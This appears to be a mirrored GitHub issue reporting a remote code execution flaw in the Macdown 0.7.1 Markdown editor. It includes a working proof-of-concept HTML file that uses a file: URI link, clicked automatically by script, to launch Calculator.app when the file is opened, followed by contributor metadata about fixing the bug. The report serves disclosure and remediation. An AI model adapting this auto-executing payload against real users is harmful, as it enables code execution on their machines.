Macdown Version 0.7.1 (870) Remote Code Execution

(7 留言) (1 反應) (0 負責人)Objective-C (7,686 star) (930 fork)batch import

help wantedon hold

描述

Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing thefile:\\ URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the MacOS Calculator.app when opened inside of Macdown.

PoC (PoC.md):

<!DOCTYPE html>
<html>
<body>

<a href="file:\\\Applications\Calculator.app" id=exploit download>
  <img src="/images/exploit.jpg" alt="exploit" width="104" height="142">
</a>

<script>
(function download() {
    document.getElementById('exploit').click();
})()
</script>

</body>
</html>

Screenshot:

PoC.md.zip

貢獻者指南

技術棧: objective chtmljavascript
領域: securitydesktop
議題類型: security
難度: 4
預計時間: over 1 week
活動狀態: stale
清晰度: clear
前置要求: Objective CmacOS sandboxingHTML security
新手友善度: 20
研究方向: The issue is a remote code execution via unsanitized file:// URIs in HTML attributes. The fix requires locating where Macdown renders HTML (likely a WebView) and implementing input sanitization or URI scheme whitelisting. Review the attached PoC and test to ensure no other dangerous schemes are allowed. Check the comments for any maintainer guidance or prior attempts.